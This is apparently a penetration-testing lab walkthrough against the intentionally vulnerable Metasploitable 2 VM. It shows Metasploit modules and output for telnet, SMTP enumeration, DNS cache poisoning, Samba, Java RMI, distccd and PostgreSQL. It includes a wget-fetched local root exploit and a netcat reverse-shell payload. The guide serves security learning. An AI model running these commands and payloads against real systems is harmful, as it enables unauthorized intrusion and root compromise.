The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
23/tcp    open  telnet      Linux telnetd

Most of the information on the Internet talks of using a password cracking tool for this Telnet service; however, there is another way using a Metasploit scanner:

msf > search telnet
[!] Database not connected or cache not built, using slow search

Matching Modules
================

Name                                                Disclosure Date  Rank       Description
—-                                                —————  —-       ———–
auxiliary/admin/http/dlink_dir_300_600_exec_noauth  2013-02-04       normal     D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution
auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof        2010-12-21       normal     Microsoft IIS FTP Server Encoded Response Overflow Trigger
auxiliary/scanner/telnet/lantronix_telnet_password                   normal     Lantronix Telnet Password Recovery
auxiliary/scanner/telnet/lantronix_telnet_version                    normal     Lantronix Telnet Service Banner Detection
auxiliary/scanner/telnet/telnet_encrypt_overflow                     normal     Telnet Service Encyption Key ID Overflow Detection
auxiliary/scanner/telnet/telnet_login                                normal     Telnet Login Check Scanner
auxiliary/scanner/telnet/telnet_ruggedcom                            normal     RuggedCom Telnet Password Generator
auxiliary/scanner/telnet/telnet_version                              normal     Telnet Service Banner Detection
auxiliary/server/capture/telnet                                      normal     Authentication Capture: Telnet
exploit/freebsd/ftp/proftp_telnet_iac               2010-11-01       great      ProFTPD 1.3.2rc3 – 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
exploit/freebsd/telnet/telnet_encrypt_keyid         2011-12-23       great      FreeBSD Telnet Service Encryption Key ID Buffer Overflow
exploit/linux/ftp/proftp_telnet_iac                 2010-11-01       great      ProFTPD 1.3.2rc3 – 1.3.3b Telnet IAC Buffer Overflow (Linux)
exploit/linux/http/dlink_diagnostic_exec_noauth     2013-03-05       excellent  D-Link DIR-645 / DIR-815 diagnostic.php Command Execution
exploit/linux/http/dlink_dir300_exec_telnet         2013-04-22       excellent  D-Link Devices Unauthenticated Remote Command Execution
exploit/linux/http/dlink_upnp_exec_noauth_telnetd   2013-07-05       excellent  D-Link Devices UPnP SOAP Telnetd Command Execution
exploit/linux/telnet/telnet_encrypt_keyid           2011-12-23       great      Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow
exploit/solaris/telnet/fuser                        2007-02-12       excellent  Sun Solaris Telnet Remote Authentication Bypass Vulnerability
exploit/solaris/telnet/ttyprompt                    2002-01-18       excellent  Solaris in.telnetd TTYPROMPT Buffer Overflow
exploit/unix/webapp/dogfood_spell_exec              2009-03-03       excellent  Dogfood CRM spell.php Remote Command Execution
exploit/windows/proxy/ccproxy_telnet_ping           2004-11-11       average    CCProxy <= v6.2 Telnet Proxy Ping Overflow
exploit/windows/telnet/gamsoft_telsrv_username      2000-07-17       average    GAMSoft TelSrv 1.5 Username Buffer Overflow
exploit/windows/telnet/goodtech_telnet              2005-03-15       average    GoodTech Telnet Server <= 5.0.6 Buffer Overflow
payload/cmd/unix/reverse                                             normal     Unix Command Shell, Double reverse TCP (telnet)
payload/cmd/unix/reverse_bash_telnet_ssl                             normal     Unix Command Shell, Reverse TCP SSL (telnet)
payload/cmd/unix/reverse_ssl_double_telnet                           normal     Unix Command Shell, Double Reverse TCP SSL (telnet)
post/windows/gather/credentials/mremote                              normal     Windows Gather mRemote Saved Password Extraction

msf > use auxiliary/scanner/telnet/telnet_version
msf auxiliary(telnet_version) > show options

Module options (auxiliary/scanner/telnet/telnet_version):

Name      Current Setting  Required  Description
—-      —————  ——–  ———–
PASSWORD                   no        The password for the specified username
RHOSTS                     yes       The target address range or CIDR identifier
RPORT     23               yes       The target port
THREADS   1                yes       The number of concurrent threads
TIMEOUT   30               yes       Timeout for the Telnet probe
USERNAME                   no        The username to authenticate as

msf auxiliary(telnet_version) > set RHOSTS 192.168.1.103
RHOSTS => 192.168.1.103
msf auxiliary(telnet_version) > set RPORT 23
RPORT => 23
msf auxiliary(telnet_version) > run

[*] 192.168.1.103:23 TELNET _                  _       _ _        _     _      ____  \x0a _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ \x0a| ‘_ ` _ \ / _ \ __/ _` / __| ‘_ \| |/ _ \| | __/ _` | ‘_ \| |/ _ \ __) |\x0a| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ \x0a|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|\x0a                            |_|                                          \x0a\x0a\x0aWarning: Never expose this VM to an untrusted network!\x0a\x0aContact: msfdev[at]metasploit.com\x0a\x0aLogin with msfadmin/msfadmin to get started\x0a\x0a\x0ametasploitable login:
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(telnet_version) >

If we look carefully at the Telnet Banner we can see Login with msfadmin/msfadmin and so armed with the username and password we can connect via the attacking Terminal:

# telnet 192.168.1.103
Trying 192.168.1.103…
Connected to 192.168.1.103.
Escape character is ‘^]’.
_                  _       _ _        _     _      ____
_ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \
| ‘_ ` _ \ / _ \ __/ _` / __| ‘_ \| |/ _ \| | __/ _` | ‘_ \| |/ _ \ __) |
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
|_|

Warning: Never expose this VM to an untrusted network!

Contact: msfdev[at]metasploit.com

Login with msfadmin/msfadmin to get started

metasploitable login: msfadmin
Password:
Last login: Tue Nov  5 13:12:09 EST 2013 on tty1
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:

http://help.ubuntu.com/

No mail.
To run a command as administrator (user “root”), use “sudo <command>”.
See “man sudo_root” for details.

msfadmin@metasploitable:~$

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
25/tcp    open  smtp        Postfix smtpd

Despite researching the Postfix email service, I haven’t uncovered an exploit; however, we can enumerate user information via Metasploit’s scanner

msf >search postfix smtp
[!] Database not connected or cache not built, using slow search

Matching Modules
================

Name                                                    Disclosure Date  Rank       Description
—-                                                    —————  —-       ———–
auxiliary/client/smtp/emailer                                            normal     Generic Emailer (SMTP)
auxiliary/dos/smtp/sendmail_prescan                     2003-09-17       normal     Sendmail SMTP Address prescan <= 8.12.8 Memory Corruption
auxiliary/dos/windows/smtp/ms06_019_exchange            2004-11-12       normal     MS06-019 Exchange MODPROP Heap Overflow
auxiliary/fuzzers/smtp/smtp_fuzzer                                       normal     SMTP Simple Fuzzer
   auxiliary/scanner/smtp/smtp_enum                                         normal     SMTP User Enumeration Utility
auxiliary/scanner/smtp/smtp_relay                                        normal     SMTP Open Relay Detection
auxiliary/scanner/smtp/smtp_version                                      normal     SMTP Banner Grabber
auxiliary/server/capture/smtp                                            normal     Authentication Capture: SMTP
auxiliary/vsploit/pii/email_pii                                          normal     VSploit Email PII
exploit/linux/misc/gld_postfix                          2005-04-12       good       GLD (Greylisting Daemon) Postfix Buffer Overflow
exploit/linux/smtp/exim4_dovecot_exec                   2013-05-03       excellent  Exim and Dovecot Insecure Configuration Command Injection
exploit/unix/smtp/clamav_milter_blackhole               2007-08-24       excellent  ClamAV Milter Blackhole-Mode Remote Code Execution
exploit/unix/smtp/exim4_string_format                   2010-12-07       excellent  Exim4 <= 4.69 string_format Function Heap Buffer Overflow
exploit/unix/webapp/squirrelmail_pgp_plugin             2007-07-09       manual     SquirrelMail PGP Plugin command execution (SMTP)
exploit/windows/browser/communicrypt_mail_activex       2010-05-19       great      CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow
exploit/windows/browser/oracle_dc_submittoexpress       2009-08-28       normal     Oracle Document Capture 10g ActiveX Control Buffer Overflow
exploit/windows/email/ms07_017_ani_loadimage_chunksize  2007-03-28       great      Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)
exploit/windows/http/mdaemon_worldclient_form2raw       2003-12-29       great      MDaemon <= 6.8.5 WorldClient form2raw.cgi Stack Buffer Overflow
exploit/windows/smtp/mailcarrier_smtp_ehlo              2004-10-26       good       TABS MailCarrier v2.51 SMTP EHLO Overflow
exploit/windows/smtp/mercury_cram_md5                   2007-08-18       great      Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow
exploit/windows/smtp/ms03_046_exchange2000_xexch50      2003-10-15       good       MS03-046 Exchange 2000 XEXCH50 Heap Overflow
exploit/windows/smtp/njstar_smtp_bof                    2011-10-31       normal     NJStar Communicator 3.00 MiniSMTP Buffer Overflow
exploit/windows/smtp/wmailserver                        2005-07-11       average    SoftiaCom WMailserver 1.0 Buffer Overflow
exploit/windows/smtp/ypops_overflow1                    2004-09-27       average    YPOPS 0.6 Buffer Overflow
exploit/windows/ssl/ms04_011_pct                        2004-04-13       average    Microsoft Private Communications Transport Overflow
post/windows/gather/credentials/outlook                                  normal     Windows Gather Microsoft Outlook Saved Password Extraction

msf use auxiliary/scanner/smtp/smtp_enum
msf auxiliary(smtp_enum) > show options

Module options (auxiliary/scanner/smtp/smtp_enum):

Name       Current Setting                                              Required  Description
—-       —————                                              ——–  ———–
RHOSTS                                                                  yes       The target address range or CIDR identifier
RPORT      25                                                           yes       The target port
THREADS    1                                                            yes       The number of concurrent threads
UNIXONLY   true                                                         yes       Skip Microsoft bannered servers when testing unix users
USER_FILE  /opt/metasploit/apps/pro/msf3/data/wordlists/unix_users.txt  yes       The file that contains a list of probable users accounts.

msf auxiliary(smtp_enum) > set RHOSTS 192.168.1.103
RHOSTS => 192.168.1.103

msf auxiliary(smtp_enum) > set RPORT 25
RPORT => 25
msf auxiliary(smtp_enum) > run

[*] 192.168.1.103:25 Banner: 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
[+] 192.168.1.103:25 Users found: , backup, bin, daemon, distccd, ftp, games, gnats, irc, libuuid, list, lp, mail, man, news, nobody, postgres, postmaster, proxy, service, sshd, sync, sys, syslog, user, uucp, www-data
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

As we can see users have been identified which might be useful in further attacks especially if any of the passwords are the same a the username.

I did connect to the Postfix email service via Telnet:

# telnet 192.168.1.103 25
Trying 192.168.1.103…
Connected to 192.168.1.103.
Escape character is ‘^]’.
220 metasploitable.localdomain ESMTP Postfix (Ubuntu)

I attempted to log on using the above user credentials, but was greeted with:

503 5.5.1 Error: authentication not enabled

So, presumably the Telnet connection is operational, but I simply don’t know how to take advantage of this.

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
53/tcp    open  domain      ISC BIND 9.4.2

It’s worth noting at the outset that neither of the below Metaploit Auxiliary’s worked for me; however, as I spent so much time researching and testing and learned whilst doing so, I’m going to detail the vulnerability as you might have success with this.

The premise of this Domain Name Server vulnerability is injecting spoofed information into the cache with the aim of overwriting and linking the details of one website with another. The consequence of this is that the user requests a website and a completely different website is served up.

The first exploit I tried was Metasploit’s Bailiwicked_Domain auxiliary

Description
===========

This exploit targets a fairly ubiquitous flaw in DNS implementations
which allow the insertion of malicious DNS records into the cache of the
target nameserver.  This exploit caches a single malicious nameserver
entry into the target nameserver which replaces the legitimate
nameservers for the target domain.  By causing the target nameserver to
query for random hostnames at the target domain, the attacker can spoof
a response to the target server including an answer for the query, an
authority server record, and an additional record for that server,
causing target nameserver to insert the additional record into the
cache.  This insertion completely replaces the original nameserver
records for the target domain.

Example
=======

# /msf3/msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

       =[ msf v3.2-release
+ -- --=[ 298 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
       =[ 73 aux

msf > use auxiliary/spoof/dns/bailiwicked_domain
msf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D
RHOST => A.B.C.D
msf auxiliary(bailiwicked_domain) > set DOMAIN example.com
DOMAIN => example.com
msf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com
NEWDNS => dns01.metasploit.com
msf auxiliary(bailiwicked_domain) > set SRCPORT 0
SRCPORT => 0
msf auxiliary(bailiwicked_domain) > check
[*] Using the Metasploit service to verify exploitability...
[*]  >> ADDRESS: A.B.C.D  PORT: 50391
[*]  >> ADDRESS: A.B.C.D  PORT: 50391
[*]  >> ADDRESS: A.B.C.D  PORT: 50391
[*]  >> ADDRESS: A.B.C.D  PORT: 50391
[*]  >> ADDRESS: A.B.C.D  PORT: 50391
[*] FAIL: This server uses static source ports and is vulnerable to poisoning
msf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D
[*] exec: dig +short -t ns example.com @A.B.C.D

b.iana-servers.net.
a.iana-servers.net.

msf auxiliary(bailiwicked_domain) > run
[*] Switching to target port 50391 based on Metasploit service
[*] Targeting nameserver A.B.C.D for injection of example.com. nameservers as dns01.metasploit.com
[*] Querying recon nameserver for example.com.'s nameservers...
[*]  Got an NS record: example.com.            171957  IN      NS      b.iana-servers.net.
[*]   Querying recon nameserver for address of b.iana-servers.net....
[*]    Got an A record: b.iana-servers.net.     171028  IN      A       193.0.0.236
[*]     Checking Authoritativeness: Querying 193.0.0.236 for example.com....
[*]     b.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
[*]  Got an NS record: example.com.            171957  IN      NS      a.iana-servers.net.
[*]   Querying recon nameserver for address of a.iana-servers.net....
[*]    Got an A record: a.iana-servers.net.     171414  IN      A       192.0.34.43
[*]     Checking Authoritativeness: Querying 192.0.34.43 for example.com....
[*]     a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
[*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391...
[*] Sent 1000 queries and 20000 spoofed responses...
[*] Sent 2000 queries and 40000 spoofed responses...
[*] Sent 3000 queries and 60000 spoofed responses...
[*] Sent 4000 queries and 80000 spoofed responses...
[*] Sent 5000 queries and 100000 spoofed responses...
[*] Sent 6000 queries and 120000 spoofed responses...
[*] Sent 7000 queries and 140000 spoofed responses...
[*] Sent 8000 queries and 160000 spoofed responses...
[*] Sent 9000 queries and 180000 spoofed responses...
[*] Sent 10000 queries and 200000 spoofed responses...
[*] Sent 11000 queries and 220000 spoofed responses...
[*] Sent 12000 queries and 240000 spoofed responses...
[*] Sent 13000 queries and 260000 spoofed responses...
[*] Poisoning successful after 13250 attempts: example.com. == dns01.metasploit.com
[*] Auxiliary module execution completed

msf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D
[*] exec: dig +short -t ns example.com @A.B.C.D

dns01.metasploit.com.

It’s worth noting the “Check” switch doesn’t work anymore.

The second exploit I tried was Metasploit’s Bailiwicked_Host Auxiliary and the process is detailed in the below two videos:

Again, neither of these exploits worked for me, but hopefully you may have more success.

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)

What is Samba?

Samba is software that can be run on a platform other than Microsoft Windows, for example, UNIX, Linux, IBM System 390, OpenVMS, and other operating systems. Samba uses the TCP/IP protocol that is installed on the host server. When correctly configured, it allows that host to interact with a Microsoft Windows client or server as if it is a Windows file and print server.

SMBD is part of Samba and is the server daemon that provides filesharing and printing services to Windows clients. The server provides filespace and printer services to clients using the SMB (or CIFS) protocol.

We can use the smbclient in the attacking Terminal to investigate the Samba Server. When prompted for the root password simply hit enter.

~# smbclient -L //192.168.1.103
Enter root's password: 
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	tmp             Disk      oh noes!
	opt             Disk      
	IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
	ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

	Server               Comment
	---------            -------
	METASPLOITABLE       metasploitable server (Samba 3.0.20-Debian)

	Workgroup            Master
	---------            -------
	HOME                 BTHUB3
	WORKGROUP            METASPLOITABLE

We can dig down deeper into the tmp if we wish:

:~# smbclient //192.168.1.103/tmp
Enter root's password: 
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
smb: \> ls
  .                                   D        0  Tue Nov 12 07:58:34 2013
  ..                                 DR        0  Sun May 20 20:36:12 2012
  5251.jsvc_up                        R        0  Mon Nov 11 15:02:52 2013
  .ICE-unix                          DH        0  Mon Nov 11 15:01:07 2013
  .X11-unix                          DH        0  Mon Nov 11 15:01:52 2013
  .X0-lock                           HR       11  Mon Nov 11 15:01:52 2013

		56891 blocks of size 131072. 42480 blocks available
smb: \>

We can check if this is writable:

smb: \> mkdir test
smb: \> ls
  .                                   D        0  Tue Nov 12 08:00:45 2013
  ..                                 DR        0  Sun May 20 20:36:12 2012
  5251.jsvc_up                        R        0  Mon Nov 11 15:02:52 2013
  .ICE-unix                          DH        0  Mon Nov 11 15:01:07 2013
  .X11-unix                          DH        0  Mon Nov 11 15:01:52 2013
  .X0-lock                           HR       11  Mon Nov 11 15:01:52 2013
  test                                D        0  Tue Nov 12 08:00:45 2013

It is indeed writable.

Our investigations have revealed Samba version 3.0.20 and the associated exploit is well documented:

A user named “kcopedarookie” posted what they claim to be a video of a zero-day exploit in Samba on youtube yesterday.

The video shows modifications to smbclient allowing /etc/passwd to be downloaded from a remote server.

The issue is actually a default insecure configuration in Samba.

Quick FAQ: What do I do !

Set:

  wide links = no

in the [global] section of your smb.conf and restart smbd to eliminate this problem.

Longer FAQ: The real issue

The problem comes from a combination of two features in Samba, each of which on their own are useful to Administrators, but in combination allow users to access any file on the system that their logged in username has permissions to read (this is not a privilege escalation problem).

By default Samba ships with the parameter “wide links = yes”, which allows Administrators to locally (on the server) add a symbolic link inside an exported share which SMB/CIFS clients will follow.

As an example, given a share definition:

  [tmp]
	path = /tmp
	read only = no
	guest ok = yes

The administrator could add a symlink:

  $ ln -s /etc/passwd /tmp/passwd

and SMB/CIFS clients would then see a file called “passwd” within the [tmp] share that could be read and would allow clients to read /etc/passwd.

If the “wide links” parameter is set to “no”, any attempt to read this file will fail with an “access denied” error.

The problem occurs as Samba allows clients using the UNIX extensions (which are also turned on by default) to create symlinks on remotely mounted shares on which they have write access that point to any path on the file system.

This is by design, as applications running on UNIX clients may have good reasons to create symlinks anywhere on the filesystem they have write access that point to local files (such as /etc/passwd).

UNIX clients will resolve these links locally, but Windows clients will resolve them on the server. It is this combination that causes the problem.

All future versions of Samba will have the parameter “wide links” set to “no” by default, and the manual pages will be updated to explain this issue.

OK, to the Metasploit exploit: This Samba version allows for symbolic links anywhere on the filesystem by default and so we use Metasploit’s Samba_symlink_traversal auxiliary:

msf > use auxiliary/admin/smb/samba_symlink_traversal
msf auxiliary(samba_symlink_traversal) > show options
Module options (auxiliary/admin/smb/samba_symlink_traversal):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBSHARE yes The name of a writeable share on the server
SMBTARGET rootfs yes The name of the directory that should point to the root filesystem

msf auxiliary(samba_symlink_traversal) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf auxiliary(samba_symlink_traversal) > set smbshare tmp
smbshare => tmp
msf auxiliary(samba_symlink_traversal) > exploit

[*] Connecting to the server...
[*] Trying to mount writeable share 'tmp'...
[*] Trying to link 'rootfs' to the root filesystem...
[*] Now access the following share to browse the root filesystem:
[*] \\192.168.1.103\tmp\rootfs\

[*] Auxiliary module execution completed

If we now return to the smbclient, we will be served up with access to all of the disk’s contents from the rootfs folder:

:~# smbclient //192.168.1.103/tmp
Enter root's password: 
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
smb: \> ls
  .                                   D        0  Tue Nov 12 08:35:42 2013
  ..                                 DR        0  Sun May 20 20:36:12 2012
  5251.jsvc_up                        R        0  Mon Nov 11 15:02:52 2013
  .ICE-unix                          DH        0  Mon Nov 11 15:01:07 2013
  .X11-unix                          DH        0  Mon Nov 11 15:01:52 2013
  .X0-lock                           HR       11  Mon Nov 11 15:01:52 2013
  rootfs                             DR        0  Sun May 20 20:36:12 2012
  test                                D        0  Tue Nov 12 08:00:45 2013

		56891 blocks of size 131072. 42480 blocks available
smb: \> cd rootfs
smb: \rootfs\> ls
  .                                  DR        0  Sun May 20 20:36:12 2012
  ..                                 DR        0  Sun May 20 20:36:12 2012
  initrd                             DR        0  Tue Mar 16 23:57:40 2010
  media                              DR        0  Tue Mar 16 23:55:52 2010
  bin                                DR        0  Mon May 14 05:35:33 2012
  lost+found                         DR        0  Tue Mar 16 23:55:15 2010
  mnt                                DR        0  Wed Apr 28 22:16:56 2010
  sbin                               DR        0  Mon May 14 03:54:53 2012
  initrd.img                          R  7929183  Mon May 14 05:35:56 2012
  home                               DR        0  Fri Apr 16 08:16:02 2010
  lib                                DR        0  Mon May 14 05:35:22 2012
  usr                                DR        0  Wed Apr 28 06:06:37 2010
  proc                               DR        0  Mon Nov 11 15:00:24 2013
  root                               DR        0  Mon Nov 11 15:01:51 2013
  sys                                DR        0  Mon Nov 11 15:00:28 2013
  boot                               DR        0  Mon May 14 05:36:28 2012
  nohup.out                           R     6542  Mon Nov 11 15:01:51 2013
  etc                                DR        0  Mon Nov 11 15:01:24 2013
  dev                                DR        0  Mon Nov 11 15:01:09 2013
  vmlinuz                             R  1987288  Thu Apr 10 18:55:41 2008
  opt                                DR        0  Tue Mar 16 23:57:39 2010
  var                                DR        0  Wed Mar 17 15:08:23 2010
  cdrom                              DR        0  Tue Mar 16 23:55:51 2010
  tmp                                 D        0  Tue Nov 12 08:35:42 2013
  srv                                DR        0  Tue Mar 16 23:57:38 2010

		56891 blocks of size 131072. 42480 blocks available
smb: \rootfs\>

We can also access a shell of Samba using Metasploit’s usermap_script exploit:

msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf exploit(usermap_script) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo KBoA0aqYLD2VrWzT;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "KBoA0aqYLD2VrWzT\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.78:4444 -> 192.168.1.103:48635) at 2013-11-12 17:38:37 +0000

whoami
root

Below is a video demonstrating this Metasploit shell exploit:

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
1099/tcp  open  rmiregistry GNU Classpath grmiregistry

From Wiki:

The Java Remote Method Invocation (Java RMI) is a Java API that performs the object-oriented equivalent of remote procedure calls (RPC), with support for direct transfer of serialized Java objects and distributed garbage collection.

OK, let’s have a look in Metasploit:

msf > use exploit/multi/misc/java_rmi_server
msf exploit(java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    1099             yes       The target port
SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT  8080             yes       The local port to listen on.
SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
URIPATH                   no        The URI to use for this exploit (default is random)

Exploit target:

Id  Name
--  ----
0   Generic (Java Payload)

msf exploit(java_rmi_server) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf exploit(java_rmi_server) > exploit

[*] Started reverse handler on 192.168.1.78:4444
[*] Using URL: http://0.0.0.0:8080/02Bwa0tNBOFx
[*]  Local IP: http://192.168.1.70:8080/02Bwa0tNBOFx
[*] Connected and sending request for http://192.168.1.78:8080/02Bwa0tNBOFx/apQlsfJd.jar
[*] 192.168.1.103    java_rmi_server - Replied to request for payload JAR
[*] Sending stage (30355 bytes) to 192.168.1.103
[*] Meterpreter session 1 opened (192.168.1.78:4444 -> 192.168.1.103:54392) at 2013-11-13 09:19:06 +0000
[+] Target 192.168.1.103:1099 may be exploitable...
[*] Server stopped.

meterpreter >

Below is a video demonstrating the above exploit.

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
3632/tcp  open  distccd?

What is distccd?

Distcc is a program to distribute builds of C, C++, Objective C or Objective C++ code across several machines on a network. distcc should always generate the same results as a local build, is simple to install and use, and is usually much faster than a local compile.

OK, time to search Metasploit:

msf > search distccd
[!] Database not connected or cache not built, using slow search

Matching Modules
================

   Name                           Disclosure Date  Rank       Description
   ----                           ---------------  ----       -----------
   exploit/unix/misc/distcc_exec  2002-02-01       excellent  DistCC Daemon Command Execution

Let’s run the exploit:

msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > show options

Module options (exploit/unix/misc/distcc_exec):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  3632             yes       The target port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf exploit(distcc_exec) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf exploit(distcc_exec) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo i5VOR5zoE9EvGttx;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "i5VOR5zoE9EvGttx\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.78:4444 -> 192.168.1.103:46436) at 2013-11-19 10:59:04 +0000

whoami
daemon

As we can see from the “whoami” we have achieved a daemon shell.

Now we will escalate our privilege from daemon to root using the 141 Local Privilege Escalation Exploit.

Firstly we get the exploit:

wget http://www.exploit-db.com/download/8572
--02:23:28--  http://www.exploit-db.com/download/8572
           => `8572'
Resolving www.exploit-db.com... 23.23.129.3, 23.23.150.193
Connecting to www.exploit-db.com|23.23.129.3|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://www.exploit-db.com/download/8572/ [following]
--02:23:29--  http://www.exploit-db.com/download/8572/
           => `index.html'
Reusing existing connection to www.exploit-db.com:80.
HTTP request sent, awaiting response... 200 OK
Length: 2,768 (2.7K) [application/txt]

    0K ..                                                    100%  414.77 KB/s

02:23:30 (414.77 KB/s) - `index.html' saved [2768/2768]

mv index.html exploit.c
gcc exploit.c -o exploit

The exploit instructions are:

Pass the PID of the udevd netlink socket (listed in /proc/net/netlink, usually is the udevd PID minus 1) as argv[1].

The exploit will execute /tmp/run as root so throw whatever payload you want in there.

Put simply we must find the PID of udevd and subtract 1:

pgrep udevd
3125

Now we need to open Netcat in a new Terminal in port listening mode:

:~# nc -vlp 12345
listening on [any] 12345 ...

Now to the exploit (Note the second line is your attacking IP and the Netcat port and line three is the PID minus one.

echo "#!/bin/sh" > /tmp/run
echo "nc -e /bin/sh 192.168.1.78 12345" >> /tmp/run
./exploit 3124

And our Netcat listener should come alive:

192.168.1.103: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.1.78] from (UNKNOWN) [192.168.1.103] 55574
whoami
root

And as you can see we are root!

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 – 8.3.7

This exploit is straight forward brute force using Metasploit:

msf > use auxiliary/scanner/postgres/postgres_login
msf auxiliary(postgres_login) > set RHOSTS 192.168.1.103
RHOSTS => 192.168.1.103
msf auxiliary(postgres_login) > run

[*] 192.168.1.103:5432 Postgres - [01/21] - Trying username:'postgres' with password:'' on database 'template1'
[-] 192.168.1.103:5432 Postgres - Invalid username or password: 'postgres':''
[-] 192.168.1.103:5432 Postgres - [01/21] - Username/Password failed.
[*] 192.168.1.103:5432 Postgres - [02/21] - Trying username:'' with password:'' on database 'template1'
[-] 192.168.1.103:5432 Postgres - Invalid username or password: '':''
[-] 192.168.1.103:5432 Postgres - [02/21] - Username/Password failed.
[*] 192.168.1.103:5432 Postgres - [03/21] - Trying username:'scott' with password:'' on database 'template1'
[-] 192.168.1.103:5432 Postgres - Invalid username or password: 'scott':''
[-] 192.168.1.103:5432 Postgres - [03/21] - Username/Password failed.
[*] 192.168.1.103:5432 Postgres - [04/21] - Trying username:'admin' with password:'' on database 'template1'
[-] 192.168.1.103:5432 Postgres - Invalid username or password: 'admin':''
[-] 192.168.1.103:5432 Postgres - [04/21] - Username/Password failed.
[*] 192.168.1.103:5432 Postgres - [05/21] - Trying username:'postgres' with password:'postgres' on database 'template1'
[+] 192.168.1.103:5432 Postgres - Logged in to 'template1' with 'postgres':'postgres'
[+] 192.168.1.103:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.)

And there we have it; username and password are both postgres.

So let’s connect via the postgres client in the Terminal:

# psql -h 192.168.1.103 -U postgres -W
Password for user postgres: 
psql (9.1.9, server 8.3.1)
WARNING: psql version 9.1, server version 8.3.
         Some psql features might not work.
SSL connection (cipher: DHE-RSA-AES256-SHA, bits: 256)
Type "help" for help.

postgres=# \l
                    List of databases
